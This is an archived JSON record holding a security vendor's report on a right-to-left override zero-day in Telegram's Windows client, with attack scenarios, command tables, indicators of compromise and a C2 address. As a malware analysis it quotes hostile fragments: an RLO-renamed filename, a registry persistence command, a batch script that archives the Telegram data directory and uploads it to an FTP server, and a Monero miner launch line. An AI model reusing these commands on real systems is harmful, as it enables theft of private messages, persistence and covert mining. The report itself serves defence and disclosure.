{
	"id": "6f7a2744-54eb-4041-acac-60aeba55b839",
	"created_at": "2026-04-06T00:19:53.457358Z",
	"updated_at": "2026-04-10T03:22:10.485022Z",
	"deleted_at": null,
	"sha1_hash": "c16adad4e039d68e8b0c01b820d868d6ee4de322",
	"title": "Zero-day vulnerability in Telegram",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 722463,
	"plain_text": "Zero-day vulnerability in Telegram\r\nBy Alexey Firsh\r\nPublished: 2018-02-13 · Archived: 2026-04-05 16:08:11 UTC\r\nIn October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited\r\nin the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger\r\nservice.\r\nRight-to-left override in a nutshell\r\nThe special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that\r\ncome after that character in the string. In the Unicode character table, it is represented as ‘U+202E’; one area of\r\nlegitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is\r\nusually used when displaying the name and extension of an executable file: a piece of software vulnerable to this\r\nsort of attack will display the filename incompletely or in reverse.\r\nLaunching an attack on Telegram\r\nBelow is an account of how this vulnerability was exploited in Telegram:\r\nThe cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed\r\nas follows:\r\nevil.js -\u003e photo_high_re*U+202E*gnp.js\r\nWhere *U+202E* is the RLO character to make Telegram display the remaining string gnp.js in reverse. Note\r\nthat this operation does not change the actual file – it still has the extension *.js.\r\nThe attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of\r\na JS file:\r\nWhen the user clicks on this file, the standard Windows security notification is displayed:\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 1 of 15\n\nImportantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. If the user clicks\r\non ‘Run’, the malicious file is launched.\r\nExploitation in the wild\r\nAfter learning the vulnerability, we began to research cases where it was actually exploited. These cases fall into\r\nseveral general scenarios.\r\nRemote control\r\nThe aim of this sort of attack is to take control of the victim’s system, and involves the attacker studying the target\r\nsystem’s environment and the installation of additional modules.\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 2 of 15\n\nAttack flowchart\r\nAt the first stage, a downloader is sent to the target, which is written in .Net, and uses Telegram API as the\r\ncommand protocol:\r\nWith this token and API, it is easy to find the Telegram bot via which the infected systems are controlled:\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 3 of 15\n\nWhen launched, it modifies startup registry key to achieve persistence on a system and copies its executable file\r\ninto one of the directories, depending on the environment:\r\nThen it begins to check every two seconds for commands arriving from the control bot. Note that the commands\r\nare implemented in Russian:\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 4 of 15\n\nThe list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors,\r\nloggers and other malware on the target system. A complete list of supported commands is given below:\r\nCommand\r\n(English\r\ntranslation)\r\nFunction\r\n“Онлайн\r\n(“Online)\r\nSend list of files in directory to control bot.\r\n“Запус\r\n(“Launch)\r\nLaunch executable file using Process.Start().\r\n“Логгер\r\n(“Logger)\r\nCheck if tor process is running, download logg.zip, unpack it, delete the archive and\r\nlaunch its content.\r\n“Скачать\r\n(“Download)\r\nDownload file into its own directory.\r\n“Удалить\r\n(“Delete)\r\nDelete file from its own directory.\r\n“Распаковать\r\n(“Unpack)\r\nUnpack archive in its own directory using specified password.\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 5 of 15\n\nУбить\r\n(Kill)\r\nTerminate specified process using process.Kill()\r\nСкачат\r\n(Download)\r\nSame as ‘Download’ (see above), with different command parsing.\r\nЗапуск\r\n(Launch)\r\nSame as ‘Launch’ (see above), with different command parsing.\r\nУдалить\r\n(Delete)\r\nSame as ‘Delete’ (see above), with different command parsing.\r\nРаспаковать\r\n(Unpack)\r\nSame as ‘Unpack’ (see above), with different command parsing.\r\nПроцессы\r\n(Processes)\r\nSend a list of commands running on target PC to control bot.\r\nAn analysis of these commands shows that this loader may be designed to download another piece of malware,\r\npossibly a logger that would spy on the victim user.\r\nMiners and more\r\nAmid the cryptocurrency boom, cybercriminals are increasingly moving away from ‘classic robbery’ to a new\r\nmethod of making money from their victims – namely mining cryptocurrency using the resources of an infected\r\ncomputer. All they have to do is run a mining client on the victim computer and specify the details of their\r\ncryptocurrency wallet.\r\nScenario #1\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 6 of 15\n\nAttack flowchart\r\nAt the first stage of the attack, an SFX archive with a script is used that launches an executable file:\r\nPath=%temp%adr\r\nSetup=%temp%adrrun.exe\r\nSilent=1\r\nOverwrite=2\r\nThis run.exe file is in fact a BAT file. The batch script, after extraction, looks like this:\r\nAs we can see, the malicious program first opens a decoy file – in this case it is an image to lull the victim into a\r\nfalse sense of security.\r\nThen, two miners launch one after the other. They are launched as services with the help of the nssm.exe utility,\r\nwhich is also contained in the same SFX archive.\r\nWe have seen several versions of this batch script, some of which have extra features:\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 7 of 15\n\nThis specific version disables Windows security features, then logs on to a malicious FTP server, downloads a\r\npayload and launches it. In this case, the payload was an SFX archive that contains another miners and a Remote\r\nManipulator System (RMS) client, an analog of TeamViewer. Using AutoIt scripts, the malware deploys RMS on\r\nthe targeted computer for subsequent remote access:\r\nThe attack flowchart is approximately as follows:\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 8 of 15\n\nWe have examined this FTP server and found several more similar payloads, which are possibly loaded by other\r\nversions of this malware.\r\nThe file address4.exe is worthy of a special mention. Like the other files, it is an SFX archive with the following\r\ncontents:\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 9 of 15\n\nAll components named st*.exe are executable PE files converted in a similar way from batch scripts.\r\nThe SFX script launches the component st1.exe:\r\nPath=%temp%/adress\r\nSetup=%temp%/adress/st1.exe\r\nSilent=1\r\nOverwrite=2\r\nst1.exe adds st2.exe to the system startup by writing the appropriate record to the system registry:\r\nreg add HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRunOnce /v RUN1 /d\r\n%temp%adressst2.exe /f\r\nSo the st2.exe file launches when system is booted next time:\r\nTIMEOUT /T 10 /NOBREAK #Waits for Telegram to launch\r\nchcp 1251\r\ntskill telegram\r\ntaskkill /IM telegram.exe #Terminates Telegram processes\r\nmd %temp%sss\r\ncd %temp%sss #Creates a temporary directory\r\n“%temp%adressWinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%sss1.rar”\r\n“%appdata%Telegram Desktop” #Packs the Telegram directory into a RAR archive\r\nTIMEOUT /T 60 /NOBREAK\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 10 of 15\n\n:begin\r\nping -n 1 ya.ru |\u003enul find /i “TTL=” \u0026\u0026 (start “” %temp%/adress/st3.exe) || (ping 127.1 -n 2\u0026 Goto :begin)\r\n#Checks Internet connection and launches st3.exe\r\nAs expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier:\r\n@echo XXXXXXXX\u003ecommand.txt\r\n@echo XXXXXXXX\u003e\u003ecommand.txt\r\n@echo binary\u003e\u003ecommand.txt\r\n@echo mput %temp%sss*.rar\u003e\u003ecommand.txt\r\n@echo quit\u003e\u003ecommand.txt\r\nftp -s:command.txt -i free11.beget.com\r\ndel command.txt\r\nattrib %temp%/adress +H\r\nattrib %temp%/adress* +H\r\nOn that FTP server, we discovered several archives of this type containing Telegram directories stolen from the\r\nvictims:\r\nEach dump contains, as well as the Telegram client’s executables and utility files, an encrypted local cache\r\ncontaining different files used in personal communications: documents, videos and audio records and photos.\r\nScenario #2\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 11 of 15\n\nJust like in the previous scenario, an attack starts with an SFX archive opening and launching a VBScript that it\r\ncontains. Its main job is to open a decoy image to distract the user, and then download and launch the payload:\r\nThe payload is an SFX archive with the following script:\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 12 of 15\n\nsvchost.vbs is a script controlling the launch of the miner CryptoNight (csrs.exe). It monitors the task list; if it\r\ndetects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s process and re-launches it when the task manager is closed.\r\nThe script contains the appropriate comments:\r\nThe miner itself is launched as follows:\r\nWshShell.Run “csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u\r\nXXXXXXXXX@yandex.ru -p x -dbg -1″ \u0026 cores, 0\r\nThe pool address is associated with the cryptocurrency Monero.\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 13 of 15\n\nOn the server itself, in addition to the specified payload files, we found similar SFX archives with miners:\r\nConclusion\r\nIt appears that only Russian cybercriminals were aware of this vulnerability, with all the exploitation cases that we\r\ndetected occurring in Russia. Also, while conducting a detailed research of these attacks we discovered a lot of\r\nartifacts that pointed to involvement by Russian cybercriminals.\r\nWe don’t have exact information about how long and which versions of the Telegram products were affected by\r\nthe vulnerability. What we do know is that its exploitation in Windows clients began in March 2017. We informed\r\nthe Telegram developers of the problem, and the vulnerability no longer occurs in Telegram’s products.\r\nThis paper presents only those cases that were reported by Kaspersky Lab’s telemetry systems. The full scope and\r\nother methods of exploitation remain unknown.\r\nIoC\r\nMD5\r\nFirst stage\r\n650DDDE919F9E5B854F8C375D3251C21\r\nC384E62E483896799B38437E53CD9749\r\nFA391BEAAF8B087A332833E618ABC358\r\n52F7B21CCD7B1159908BCAA143E27945\r\nB1760E8581F6745CBFCBE76FBD0ACBFA\r\nA662D942F0E43474984766197288845B\r\nPayloads\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 14 of 15\n\nB9EEC74CA8B14F899837A6BEB7094F65\r\n46B36F8FF2369E883300F472694BBD4D\r\n10B1301EAB4B4A00E7654ECFA6454B20\r\nCD5C5423EC3D19E864B2AE1C1A9DDBBC\r\n7A3D9C0E2EA27F1B96AEFED2BF8971A4\r\nE89FDDB32D7EC98B3B68AB7681FACCFC\r\n27DDD96A87FBA2C15B5C971BA6EB80C6\r\n844825B1336405DDE728B993C6B52A83\r\nC6A795C27DEC3F5559FD65884457F6F3\r\n89E42CB485D65F71F62BC1B64C6BEC95\r\n0492C336E869A14071B1B0EF613D9899\r\n2CC9ECD5566C921D3876330DFC66FC02\r\n1CE28167436919BD0A8C1F47AB1182C4\r\nC2 servers\r\nhttp://nord.adr[.]com[.]ua/\r\nFilenames\r\nname?gpj.exe\r\nname?gpj.rar\r\naddress?gpj.scr\r\naddress_?gpj.scr\r\nphotoadr?gepj.scr\r\nSource: https://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nhttps://securelist.com/zero-day-vulnerability-in-telegram/83800/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://securelist.com/zero-day-vulnerability-in-telegram/83800/"
	],
	"report_names": [
		"83800"
	],
	"threat_actors": [],
	"ts_created_at": 1775434793,
	"ts_updated_at": 1775791330,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c16adad4e039d68e8b0c01b820d868d6ee4de322.pdf",
		"text": "https://archive.orkl.eu/c16adad4e039d68e8b0c01b820d868d6ee4de322.txt",
		"img": "https://archive.orkl.eu/c16adad4e039d68e8b0c01b820d868d6ee4de322.jpg"
	}
}